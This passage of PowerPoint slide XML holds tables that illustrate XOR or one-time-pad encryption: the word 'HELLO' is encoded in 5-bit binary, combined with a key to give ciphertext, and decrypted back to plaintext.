                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>message</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="365760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>00111 (7) </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> 00100 (4)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>01011</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>(11)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> 01011</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>(11)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>01110 (14)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>encoding</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="365760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    10111</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="10000"/>
                        <a:lumOff val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>  01100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="10000"/>
                        <a:lumOff val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> 00010</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="10000"/>
                        <a:lumOff val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>   01010</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="10000"/>
                        <a:lumOff val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>   01011</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="10000"/>
                        <a:lumOff val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>key </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="10000"/>
                        <a:lumOff val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="365760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>    10000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  01000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> 01001</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   00001</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   00101</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ciphertext</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75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07946207"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="761999" y="4363720"/>
          <a:ext cx="7467601" cy="1503680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1218671"/>
                <a:gridCol w="1218671"/>
                <a:gridCol w="1218671"/>
                <a:gridCol w="1218671"/>
                <a:gridCol w="1192742"/>
                <a:gridCol w="1400175"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>    10000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>    01000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>    01001</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>    00001</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>    00101</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ciphertext</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="391160">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    10111</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    01100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    00010</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    01010</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    01011</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>key </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    00111</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    00100</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    01011</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    01011</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>    01110</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>plaintext</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>H</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
